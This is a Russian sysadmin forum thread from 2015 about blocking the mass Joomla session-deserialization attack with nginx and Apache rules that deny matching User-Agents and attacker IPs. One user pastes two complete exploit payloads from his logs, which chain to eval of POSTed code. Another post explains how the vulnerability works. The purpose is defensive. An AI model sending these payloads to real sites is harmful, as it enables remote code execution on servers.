forum.opennet.ru - "Раздел полезных советов: Блокировка атаки на Joomla силами n..." (17)

форумы

помощь

поиск

регистрация

майллист

вход/выход

слежка

"Раздел полезных советов: Блокировка атаки на Joomla силами n..."

Форум Разговоры, обсуждение новостей
Вариант для распечатки		Пред. тема \| След. тема
Изначальное сообщение		[ Отслеживать ]

"Раздел полезных советов: Блокировка атаки на Joomla силами n..."	+/–
Сообщение от auto_tips on 16-Дек-15, 10:46
Продолжается [[https://www.opennet.ru/opennews/art.shtml?num=43521 массовая атака]] на сайты под управлением Joomla. К сожалению на базе данной CMS в сети много сайтов, администраторы которых не спешат устанавливать обновления. На системах хостинга можно попытаться блокировать типовую автоматизированную атаку централизованно, на стороне сервера. Для блокировки можно заблокировать обращение c User Agent "JDatabaseDriverMysql" и "O:", а также запретить обращение c IP-адресов, с которых зафиксировано проведение атаки. Пример для nginx: http { map $http_user_agent $blocked_ua { ~(?i)JDatabaseDriverMysql 1; ~(?i)O: 1; default 0; } map $remote_addr $blocked_ip { 74.3.170.33 1; 146.0.72.83 1; 194.28.174.106 1; default 0; } server { listen 80; if ($blocked_ua) { return 403; } if ($blocked_ip) { return 403; } # ... } } Пример для apache httpd: RewriteCond %{REMOTE_ADDR} =74.3.170.33 [OR] RewriteCond %{REMOTE_ADDR} =146.0.72.83 [OR] RewriteCond %{REMOTE_ADDR} =194.28.174.106 RewriteRule .* / [F] RewriteCond %{HTTP_USER_AGENT} JDatabaseDriverMysql [OR] RewriteCond %{HTTP_USER_AGENT} O\: RewriteRule .* / [F] URL: https://www.nginx.com/blog/new-joomla-exploit-cve-2015-8562/ Обсуждается: https://www.opennet.ru/tips/info/2930.shtml
Ответить \| Правка \| Cообщить модератору

Оглавление

Блокировка атаки на Joomla силами nginx и apache, ааааа, 10:46 , 16-Дек-15, (1)
Блокировка атаки на Joomla силами nginx и apache, тигар, 13:26 , 16-Дек-15, (2)
Раздел полезных советов: Блокировка атаки на Joomla силами n..., adsh, 22:31 , 16-Дек-15, (3)

Раздел полезных советов: Блокировка атаки на Joomla силами n..., Аноним, 23:26 , 16-Дек-15, (4) +1

Блокировка атаки на Joomla силами nginx и apache, ононимъ, 07:33 , 17-Дек-15, (5)

Блокировка атаки на Joomla силами nginx и apache, Slava, 13:37 , 18-Дек-15, (8)

Блокировка атаки на Joomla силами nginx и apache, Slava, 13:58 , 18-Дек-15, (9)

Блокировка атаки на Joomla силами nginx и apache, Евгений, 10:43 , 17-Дек-15, (6)
Блокировка атаки на Joomla силами nginx и apache, Slava, 13:33 , 18-Дек-15, (7)

Блокировка атаки на Joomla силами nginx и apache, pavlinux, 19:38 , 21-Дек-15, (10)

Блокировка атаки на Joomla силами nginx и apache, Аноним, 22:10 , 24-Дек-15, (14)

Блокировка атаки на Joomla силами nginx и apache, kleemhead, 22:54 , 21-Дек-15, (11)
Блокировка атаки на Joomla силами nginx и apache, kleemhead, 22:58 , 21-Дек-15, (12)

Блокировка атаки на Joomla силами nginx и apache, pavlinux, 02:08 , 27-Дек-15, (15)

Блокировка атаки на Joomla силами nginx и apache, ононимъ, 08:49 , 22-Дек-15, (13)

Блокировка атаки на Joomla силами nginx и apache, анонимь, 15:46 , 29-Дек-15, (16)

Блокировка атаки на Joomla силами nginx и apache, ааааа, 20:02 , 30-Дек-15, (17)

Сообщения по теме [Сортировка по времени | RSS]

1. "Блокировка атаки на Joomla силами nginx и apache" +/–

Сообщение от ааааа on 16-Дек-15, 10:46

if ($http_user_agent ~* ".*\{.*")
{
return 403;
}

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

2. "Блокировка атаки на Joomla силами nginx и apache" +/–

Сообщение от тигар (ok) on 16-Дек-15, 13:26

"отдавать" нужно 444, а не 403. ибо нефиг

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

3. "Раздел полезных советов: Блокировка атаки на Joomla силами n..." +/–

Сообщение от adsh (ok) on 16-Дек-15, 22:31

> Для блокировки можно заблокировать обращение c User Agent "JDatabaseDriverMysql" и "O:",
> а также запретить обращение c IP-адресов, с которых зафиксировано проведение атаки.
Какой-то наивный совет. Можно подумать, что User Agent фиксированный, а атаковать додумаются лишь с трёх адресов из всего интернет.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

4. "Раздел полезных советов: Блокировка атаки на Joomla силами n..." +1 +/–

Сообщение от Аноним (??) on 16-Дек-15, 23:26

> Какой-то наивный совет. Можно подумать, что User Agent фиксированный, а атаковать додумаются
> лишь с трёх адресов из всего интернет.
Боты пока зафиксированы только с этих адресов, а маска в User Agent это часть кода для атаки. Целевые атаки не рассматриваются, так как защищают таким способом только никому уже не нужные протухшие сайты, интересные только ботам.

Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

5. "Блокировка атаки на Joomla силами nginx и apache" +/–

Сообщение от ононимъ on 17-Дек-15, 07:33

слушайте, а если в логах заход с таким UserAgent был - как проверить, установлен ли шелл или т.п. вредоносные мероприятия? патч сразу был поставлен, .htaccess поправлен, следующие попытки - 403, но 1-2-то пролезли...

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

8. "Блокировка атаки на Joomla силами nginx и apache" +/–

Сообщение от Slava (??) on 18-Дек-15, 13:37

обновился вовремя, но присоеденюсь к вопросу

Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

9. "Блокировка атаки на Joomla силами nginx и apache" +/–

Сообщение от Slava (??) on 18-Дек-15, 13:58

строки в логе следующие:
\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:57:\x22eval(base64_decode($_POST[s]));JFactory::getConfig();exit\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\xFD\xFD\xFD"
и
\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:102:\x22eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST[s]))))));JFactory::getConfig();exit\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\xFD\xFD\xFD"
расшифруйте, кто знает

Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

6. "Блокировка атаки на Joomla силами nginx и apache" +/–

Сообщение от Евгений (??) on 17-Дек-15, 10:43

Фиксирую эпизоды атаки на сайты при помощи внедрения вышеописанного эксплоита в HTTP заголовок "x_forwarded_for".

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

7. "Блокировка атаки на Joomla силами nginx и apache" +/–

Сообщение от Slava (??) on 18-Дек-15, 13:33

ip адреса с которых идет атака разные
46.45.183.142
178.76.225.33
112.184.95.6
202.142.105.229
91.214.84.166
95.135.182.10
93.168.108.29
89.147.250.103
105.227.191.131
122.179.67.16
весь интернет не заблокируешь

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

10. "Блокировка атаки на Joomla силами nginx и apache" +/–

Сообщение от pavlinux (ok) on 21-Дек-15, 19:38

> весь интернет не заблокируешь
ifconfig eth0 down;

Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

14. "Блокировка атаки на Joomla силами nginx и apache" +/–

Сообщение от Аноним (??) on 24-Дек-15, 22:10

# halt

Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

11. "Блокировка атаки на Joomla силами nginx и apache" +/–

Сообщение от kleemhead on 21-Дек-15, 22:54

>ifconfig eth0 down;
Для параноидального режима
iptables -P INPUT DROP
poweroff

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

12. "Блокировка атаки на Joomla силами nginx и apache" +/–

Сообщение от kleemhead on 21-Дек-15, 22:58

>ifconfig eth0 down;
ifdown eth0

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

15. "Блокировка атаки на Joomla силами nginx и apache" +/–

Сообщение от pavlinux (ok) on 27-Дек-15, 02:08

# ifdown eth0
sh: ifdown: Command not found

Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

13. "Блокировка атаки на Joomla силами nginx и apache" +/–

Сообщение от ононимъ on 22-Дек-15, 08:49

а всё таки, гуру просветлённые с недюжинным ч.ю., есть ответ? в логах следы есть, файлов изменённых в папке сайта нет. куда ещё копать, где проверить?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

16. "Блокировка атаки на Joomla силами nginx и apache" +/–

Сообщение от анонимь on 29-Дек-15, 15:46

Оналогично, дружище. Всё проверил, ничего не нашёл. Что делает эта строка, кто-нибудь может описать?

Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

17. "Блокировка атаки на Joomla силами nginx и apache" +/–

Сообщение от ааааа on 30-Дек-15, 20:02

произвольный код исполняется... вебшеллы не залили, лишних пользователей в джумлу не добавили - уже хорошо...
====
В коде обработчика сессий Joomla пристутствует уязвимость, которая позволяет осуществить внедрение строки в синтаксис сериализованной сессии через HTTP-заголовки User-Agent и X-Forwarded-For. Эксплоит использует особенность MySQL при обработке utf8-символов из диапазона U+010000 — U+10FFFF. При вставке строки, в конце которой присутствует такой символ, MySQL обрежет данные. Это позволяет сформировать и записать в таблицу сессий строку, в которой присутствуют пользовательские PHP-объекты, без нарушения синтаксиса. В ходе десериализации сессии атакующего вызываются деструкторы классов Joomla, что ведет к выполнению произвольного кода
====

Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру

1. "Блокировка атаки на Joomla силами nginx и apache"	+/–
Сообщение от ааааа on 16-Дек-15, 10:46
if ($http_user_agent ~* ".\{.") { return 403; }
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору

2. "Блокировка атаки на Joomla силами nginx и apache"	+/–
Сообщение от тигар (ok) on 16-Дек-15, 13:26
"отдавать" нужно 444, а не 403. ибо нефиг
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору

3. "Раздел полезных советов: Блокировка атаки на Joomla силами n..."	+/–
Сообщение от adsh (ok) on 16-Дек-15, 22:31
> Для блокировки можно заблокировать обращение c User Agent "JDatabaseDriverMysql" и "O:", > а также запретить обращение c IP-адресов, с которых зафиксировано проведение атаки. Какой-то наивный совет. Можно подумать, что User Agent фиксированный, а атаковать додумаются лишь с трёх адресов из всего интернет.
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору


	4. "Раздел полезных советов: Блокировка атаки на Joomla силами n..."	+1 +/–
	Сообщение от Аноним (??) on 16-Дек-15, 23:26
	> Какой-то наивный совет. Можно подумать, что User Agent фиксированный, а атаковать додумаются > лишь с трёх адресов из всего интернет. Боты пока зафиксированы только с этих адресов, а маска в User Agent это часть кода для атаки. Целевые атаки не рассматриваются, так как защищают таким способом только никому уже не нужные протухшие сайты, интересные только ботам.
	Ответить \| Правка \| ^ к родителю #3 \| Наверх \| Cообщить модератору

5. "Блокировка атаки на Joomla силами nginx и apache"	+/–
Сообщение от ононимъ on 17-Дек-15, 07:33
слушайте, а если в логах заход с таким UserAgent был - как проверить, установлен ли шелл или т.п. вредоносные мероприятия? патч сразу был поставлен, .htaccess поправлен, следующие попытки - 403, но 1-2-то пролезли...
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору


	8. "Блокировка атаки на Joomla силами nginx и apache"	+/–
	Сообщение от Slava (??) on 18-Дек-15, 13:37
	обновился вовремя, но присоеденюсь к вопросу
	Ответить \| Правка \| ^ к родителю #5 \| Наверх \| Cообщить модератору


	9. "Блокировка атаки на Joomla силами nginx и apache"	+/–
	Сообщение от Slava (??) on 18-Дек-15, 13:58
	строки в логе следующие: \x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:57:\x22eval(base64_decode($_POST[s]));JFactory::getConfig();exit\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\xFD\xFD\xFD" и \x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:102:\x22eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST[s]))))));JFactory::getConfig();exit\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\xFD\xFD\xFD" расшифруйте, кто знает
	Ответить \| Правка \| ^ к родителю #8 \| Наверх \| Cообщить модератору

6. "Блокировка атаки на Joomla силами nginx и apache"	+/–
Сообщение от Евгений (??) on 17-Дек-15, 10:43
Фиксирую эпизоды атаки на сайты при помощи внедрения вышеописанного эксплоита в HTTP заголовок "x_forwarded_for".
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору

7. "Блокировка атаки на Joomla силами nginx и apache"	+/–
Сообщение от Slava (??) on 18-Дек-15, 13:33
ip адреса с которых идет атака разные 46.45.183.142 178.76.225.33 112.184.95.6 202.142.105.229 91.214.84.166 95.135.182.10 93.168.108.29 89.147.250.103 105.227.191.131 122.179.67.16 весь интернет не заблокируешь
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору


	10. "Блокировка атаки на Joomla силами nginx и apache"	+/–
	Сообщение от pavlinux (ok) on 21-Дек-15, 19:38
	> весь интернет не заблокируешь ifconfig eth0 down;
	Ответить \| Правка \| ^ к родителю #7 \| Наверх \| Cообщить модератору


	14. "Блокировка атаки на Joomla силами nginx и apache"	+/–
	Сообщение от Аноним (??) on 24-Дек-15, 22:10
	# halt
	Ответить \| Правка \| ^ к родителю #10 \| Наверх \| Cообщить модератору

11. "Блокировка атаки на Joomla силами nginx и apache"	+/–
Сообщение от kleemhead on 21-Дек-15, 22:54
>ifconfig eth0 down; Для параноидального режима iptables -P INPUT DROP poweroff
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору

12. "Блокировка атаки на Joomla силами nginx и apache"	+/–
Сообщение от kleemhead on 21-Дек-15, 22:58
>ifconfig eth0 down; ifdown eth0
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору


	15. "Блокировка атаки на Joomla силами nginx и apache"	+/–
	Сообщение от pavlinux (ok) on 27-Дек-15, 02:08
	# ifdown eth0 sh: ifdown: Command not found
	Ответить \| Правка \| ^ к родителю #12 \| Наверх \| Cообщить модератору

13. "Блокировка атаки на Joomla силами nginx и apache"	+/–
Сообщение от ононимъ on 22-Дек-15, 08:49
а всё таки, гуру просветлённые с недюжинным ч.ю., есть ответ? в логах следы есть, файлов изменённых в папке сайта нет. куда ещё копать, где проверить?
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору


	16. "Блокировка атаки на Joomla силами nginx и apache"	+/–
	Сообщение от анонимь on 29-Дек-15, 15:46
	Оналогично, дружище. Всё проверил, ничего не нашёл. Что делает эта строка, кто-нибудь может описать?
	Ответить \| Правка \| ^ к родителю #13 \| Наверх \| Cообщить модератору


	17. "Блокировка атаки на Joomla силами nginx и apache"	+/–
	Сообщение от ааааа on 30-Дек-15, 20:02
	произвольный код исполняется... вебшеллы не залили, лишних пользователей в джумлу не добавили - уже хорошо... ==== В коде обработчика сессий Joomla пристутствует уязвимость, которая позволяет осуществить внедрение строки в синтаксис сериализованной сессии через HTTP-заголовки User-Agent и X-Forwarded-For. Эксплоит использует особенность MySQL при обработке utf8-символов из диапазона U+010000 — U+10FFFF. При вставке строки, в конце которой присутствует такой символ, MySQL обрежет данные. Это позволяет сформировать и записать в таблицу сессий строку, в которой присутствуют пользовательские PHP-объекты, без нарушения синтаксиса. В ходе десериализации сессии атакующего вызываются деструкторы классов Joomla, что ведет к выполнению произвольного кода ====
	Ответить \| Правка \| ^ к родителю #16 \| Наверх \| Cообщить модератору